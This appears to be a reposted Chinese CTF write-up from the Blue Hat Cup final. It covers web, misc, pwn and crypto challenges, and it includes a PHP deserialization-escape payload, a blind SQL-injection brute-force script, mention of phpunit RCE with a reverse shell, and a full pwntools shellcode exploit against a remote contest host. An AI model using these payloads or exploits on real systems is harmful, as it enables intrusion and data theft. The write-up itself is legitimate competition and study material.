zoukankan      html  css  js  c++  java
  • 蓝帽杯决赛-爆炒腰花-WP

    蓝帽接着考试接着出去玩了一趟,所以现在才把WP发出来
    由于公安联考和考研的原因,腰花们以后就很少参加比赛了,谢谢大家对我们的帮助和支持,蓝帽也算是给腰花画上了一个圆满的句号。
    祝大家新的一年能够取得更好的成绩

    WEB

    PHP

    获取备份后发现有对序列化字符串的操作,经典的反序列化逃逸特征,

    图片

    图片

    然后发现过滤的dir并不是数组中的dir,而是我们一开始传进去的get参数,构造payload如下

    ?user=ohhhh&pass=a3333&repass=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin%22;s:3:%22dir%22;s:5:%22/flag%22;}&dir=pcyq23333

    flag:

    图片

    login:

    根据题目给的提示可以知道是phpunit框架,然后根据已知的漏洞可以在/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php中执行post进去的内容,但是本题ban掉了很多函数,然后php反弹shell也没有维持成功,利用python的反弹shell方式可以成功

    图片

    尝试直接用python的命令执行读取flag,发现权限不够,所以要想办法提权。

    然后因为本题目使用的是默认的DVWA框架,所以可以通过读取/config/config.inc.php文件来获取用户名和密码

    图片

    最后利用python实现命令行交互,获得admin权限后就可以获取flag

    flag:

    图片

    login2

    BJDCTF2020的原题,改下脚本就行

    import os
    import requests as req
    def ord2hex(string):
    result = ''
    for i in string:
    result += hex(ord(i))
    result = result.replace('0x','')
    return '0x'+result
    
    url = "http://eci-2zeh6dgtru4egt90l2sv.cloudeci1.ichunqiu.com:80/index.php"
    string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
    headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    res = ''
    for i in range(50):
    for j in string:
    passwd = ord2hex('^'+res+chr(j))
    # print(passwd)
    passwd = 'or/**/password/**/regexp/**/binary/**/{}#'.format(passwd)
    data = {
    'username':"admin\",
    'password':passwd
    }
    r = req.post(url, data=data, headers=headers)
    # print(r.text)
    if "账号或密码错误!" not in r.text:
    res += chr(j)
    print(res)
    break
    

    flag:

    图片

    MISC

    签到题

    转assii

    MISC隐写

    用binwalk提取图片内容,提取出一个PDF和加密压缩

    PDF用wb4stego解密

    得到

    图片

    没解出来,但是爆破压缩包密码,得到了rmrf,keyword cipher解密

    图片

    图片

    QAQ_pcap

    在65流里找到了TLS的log,可以对TLS流量进行解密

    图片

    解密后可以提取出一个rar文件

    解压得到so_easy.pcap,文件头被改了,改回来

    图片

    对流量包进行分析,发现是多个usb设备的流量,将每个单独过滤保存。

    图片

    单独分析,有一个鼠标流量,一个键盘流量,鼠标画出来啥都不是

    流量键盘用脚本进行解析

    mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"
    ", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." ,225:"[LeftShift]",229:"[RightShift]",0x50:"[LeftArrow1]"}
    nums = []
    keys = open('key.txt')
    for line in keys:
    	if(len(line)) != 17:
    		continue
    	print(line[4:6])
    	nums.append(int(line[4:6],16))
    keys.close()
    print(nums)
    output = ""
    for n in nums:
    	if n == 0 :
    		continue
    	if n in mappings:
    		output += mappings[n]
    	else:
    		output += "["+str(n)+"]"
    print('output :
    ' + output)
    

    注意有LeftArrow1和shfit,都解释出来后就得到flag了
    flag

    Hi!This is y flag!
    The flag[] is flag{Pc@p_1s_5o_3asY!}
    Bye!
    

    PWN

    Pwn1

    图片

    Seccomp沙箱,有open read函数没有write写函数

    基本思路是构造爆破(之前打过一个比赛跟这个思路差不多都是构造shellcode比较爆破)

    open后read,使用cmp比较,等于则使用jz进行死循环,否则ret退出

    图片

    完整exp如下

    from pwn import *
    elf=ELF('./chall')
    EXCV = context.binary = './chall'
    #libc=('')
    #context.log_level = 'debug'
     
    def pwn(p, idx, c):
        # open
        shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"
     
        # re open, rax => 4
        shellcode += "push 2; pop rax; syscall;"
     
        # read(rax, 0x10040, 0x50)
        shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
        
        # cmp and jz
        if idx == 0:
            shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx, c)
        else:
            shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx, c)
     
        shellcode = asm(shellcode)
     
        p.sendafter("xecution-box.
    ", shellcode.ljust(0x40-14, b'a') + b'/home/pwn/flag')
     
    idx = 0
    var_list = []
    while(1):
        for c in range(32, 127):
            p = remote("8.131.246.36",40334)#nc 8.131.246.36 40334    
            pwn(p, idx, c)
            start = time.time()
            try:
                p.recv(timeout=2)
            except:
                pass
            end = time.time()
            p.close()
            if end-start > 1.5:
                var_list.append(c)
                print("".join([chr(i) for i in var_list]))
                break
        else:
            print("".join([chr(i) for i in var_list]))
            break
        idx = idx + 1
     
    print("".join([chr(i) for i in var_list]))
    

    经过多次失败的爆破后
    终于有了一个完整的

    图片

    CRYPTO

    common_modulus

    先用共模,算出HINT

    # 共模攻击
    import gmpy2
    import binascii as B
    n = 781036391323974008856551441504551844841173384369055361767143425092387727015642055181741701170017399241497120632344953499820518820132068694764700867696829033106666055030180813062993649803797649124562825632340854157269454042167398954816966758408050707394510052574354703514670567409229754892812751190528559839163370996270173354192391025119212070374345175232268160015709412770236244184407603397493657886160301984598114022346065772036916080039069065703045460825584095559014098364274915486192890077441915702648662247422573607141301387160468708901332801070000950051880674436952646199048944681743156311156561347137284309444428161898926050856612636204505753959646608899803680618195914959490447723147711810217755931778569656715879355497741337867486596084617334222360877256151925248867366886699774397369843538784086757551124956184373578870266105742924242667575610284091444010308038579594247922368368398449676635147254244680714381600463229849534333608407292776731721661271718860696451810720187133868564530559847589151122364073467586981976649022363672800597675920485113168688814933825793827901051904388778126030212255351752567066602576348655685594872269975311829268026394327948942096118152848379484736487085060738082253125862183108996724624059293
    c1 = 369574840235539108372094092254419274246554984982221252273253594183836400022960378170488757871945636102709146100003103420983393418895920944769809509498534206740321414394214836818668536994868508542980403916810808297197199669370712797146359430162012897117686984913530312098913792383741034334686281360853026726954824577914039860820382688425141138202072956110821496285690037742234810972548140439615644523558778763893381916419169521655893103187028705326557465586164413430726626576639348603638806511311706975958593200898505048876740706947195874397909272772688774998312506679360257618176951770041342256209410863260884750487279961933541672586237719402972217492287549068766414410155714303648473676009661943965293501994978200745219593293552499364219563185093112256120550663818918964081980469288619926291250638450874316053326601032273087039376723415701554676257043515877013761681843885375325430297941942692679848107999743068109805325264735576658206199089491608087442001508062053843516431089207243339447049547611183815785864081653492970812961076181422434762137310522146572918571492263273382927468586853431581811297567337244729976259333642991615934568219783998183005087012034016783535060297367475598352120058322912068079704771685886066199702963018
    c2 = 401003748149510002818767369230254602513865159661339906800347290711690807270702301230624025422831311596632795141531720435002853738573163182312453127686259756779068482529257900103967550779067445990067902733048774414790636519587265122992946230937925359967091172504901407334687520803755214564929157748817222608867504984640435317237940989728715980606596332309938083583162432506373976839198105889860716728175207628676903581344807944755695848151190623498753010294323617338270060040423742010145259129678264662465355879341730120526032229944482388360258216424682694404263498956947130580056839592840962191604893632645585505577517647817952448510353267629549246776809657021963707309740084072731429860522801140021375078140454523473108229522456529438036963702296406101462856177037427008765522302625128434931680973911239443952409966616788095217782552153170772137807287594897681855045237814736536800205438589010668545647972935172419082314572196606656703628418159952436419223060565888253991481370307426542468001783829259332035534414470988788183383528642038979811899061182916422795902465788443785184461640800074642736248613386467596765647696764766509793194318458994279346191732415463226129676210488158303216826287374744132977258018064709541279591219801
    e1 = 321959
    e2 = 250261
    s0, s1, s2 = gmpy2.gcdext(e1, e2)
    if s1 < 0:
        s1 = -s1
        c1 = gmpy2.invert(c1, n)
    elif s2 < 0:
        s2 = -s2
        c2 = gmpy2.invert(c2, n)
    m = gmpy2.powmod(c1, s1, n)*gmpy2.powmod(c2, s2, n) % n
    m = gmpy2.iroot(m,11)[0]
    print('[-]m is:', m)
    print(hex(m))
    print( B.a2b_hex(hex(m)[2:]))
    

    图片

    import gmpy2
    from Crypto.Util.number import *
    hint = 0x65333d3338363332312c65343d323136343337
    
    n2 = 829153922415855137264800234822397159517330834702889033537933377293887344320377111020468975059392957737449202237724182178497515850669969287557171761512943313347002707881627665997773538338624697031113180118787578098839812766590356161880633390491240275263405375614880514319024910802488825931065452764114707860207310201420715597319258880485040522551832971592910421789656655281398336391483665797851843030704262677198876702546809063670714197016598069553974073602743894202215033991282795559558580509644985355582265309273819085165244990507821708921430055578522701525123887916901778357465509369586730929688392667732886906857430517653096398002777964560127268121571049233223372798710275104635615146227690965482270801899538594859206469480776522613028131598888508457709453379574742196454867003503347438618445660900423827776062276496733498823286497376761412579384984369308185260156963156405659950843672893896087650002269874800953868406307954077672988900057904666430054296760155287271561170025767624003816826720442668295925485637633877652749338842612472516105683964067019360513619412986301224461318521372012905629559424109846511589009550745828509068711532135188012958609344134355466641890243263881890822508445307982892951553198862583429368670057993
    
    
    c3 = 159724515943626607063077852180725785535830882720862727668525327462548399711146109134244815376287134761817075519820142556357574606798840233562248755971526219627762223734393473798914901143269449212790392600105330383090174083139586064181174009077350924651070244802047181675971743583126005374180803661344948105563731243622231745397860438110568700027808240466520775159603948893458839584686022713865445974999010633338992077036339635470928309825709158252021736998333181626196852117911063143924690274341118934263954401171980866857766803251097624531349328131906037324939822709718110584612723905396082816423636920021116198893529151233844741049768382997165306708386377461537659894631638669541135139772256724755879894163220385702448163577861050255922091076291360733371557008202704744025308442559929057280944151904346146363641694256384699833066941693911888313063101709464779564216471784300409758667075242519216711038178970244130709075948085377075896223268673956328949049096893114349123857314470200317354442002350914580896785644057370606138149403529271049952702755513806243257608741081761103014849775297798769123025294190124352059867893341310583345698551198662911063194743695473937982189580136904500546179872911907699655901666991491654421172959264
    
    
    c4 = 577539997913679548128771306860581210544436789252901226997329423745523775309125445697836728285902404228772238261978792894724035857571722732772392975266650638941506233731097966088599219553016910895407298319171601788682316820727521975802034842881641332176636880671926669677709251368489592049188264858974171362799051918792714121517422464840766220636795897542591062529334135365684855298036787805819982776703613397951208027499626161971540340384357517350954755917853981444696889490414620688922414306470663625107920255478295871212500731262906706677230231273773081082937699900897018507666959617262265778895830665231960626623936539619558323350031200046331865204833002387826480300556398975518044660453862186191885052104669182124205562629260585502282489936369132703221625792917684714281278526690498041768698231671538540231217204457920089132127615505206718241082416584911313565380784068494321438301994932115301961956898936006101799945175006847294491423172988371831199816110394796146842726192613950900507852084712888550397657990358471172662866403096061418272111461743199683739447289005311734544421847876133462236161463005728810728422873087670552019575195179400831748068699257581271088746550021722434317091260496556373742562805426688588980981788900
    
    
    c =795129169552291006861754002206513820937641980698434382418936261423422746999612445764303059674219208389574024534672717069821412414159146551366545996353949783196010213553918927580779995019174186191032145333149188913037471190229239099846321485033232436935611571367541493044277081533408993875257311753734536147571167095896669077719414131452331046090464837590749820091009158875152457888900355791540044943189887475311977641143538035689663891597983971260327156044023687896426055728061855343985242964248584312808777178962375936043822201018415653235814485615205327407400780005852561278683155208683364942051067379779866515199199129202240010485952950728372189222715041921342651574061028219342292107006496306690996248232154011982638406599183117999624463176008864712361084026607499225962202418264921259296412132569498420948156231991422121967643470934361208982842203404876002586976855763264989245461870293707215153833855463524713435447265274151395156396029507394842810440848947409747692940663271981830686236597905086310965497295634452454502792579750856566644956428398186959955662345052899355866818276388556869309837579415317436154415391396745002015389421807844666877314560257175276506064197678141334956984552068148598923249237123558477833149102400
    e3=386321
    e4=216437
    s0, s1, s2 = gmpy2.gcdext(e3, e4)
    if s1<0:
    	s1 = - s1
    	c3 = gmpy2.invert(c3, n2)
    elif s2<0:
    	s2 = - s2
    	c4 = gmpy2.invert(c4, n2)
    	c = pow(c3,s1,n2)*pow(c4,s2,n2) % n2
    
    
    a = gmpy2.invert(hint**13,n2)
    d = (c*a)%n2
    flag = gmpy2.iroot(d,13)[0]
    print long_to_bytes(flag)
    

    图片

    re

  • 相关阅读:
    (转)【经验之谈】Git使用之Windows环境下配置
    (转)SQL Server内存遭遇操作系统进程压榨案例
    (转)【javascript基础】原型与原型链
    (转)微信公众平台开发教程目录
    (转)C# .net微信开发,开发认证,关注触发消息,自动应答,事件响应,自定义菜单
    (转)利用快速开发框架,快速搭建微信浏览博客园首页文章
    (转)微信公众平台开发教程(七)Session处理
    多线程入门-创建线程
    MySQL数据库优化
    图解:从单个服务器扩展到百万用户的系统
  • 原文地址:https://www.cnblogs.com/p201821440039/p/14219506.html
Copyright © 2011-2022 走看看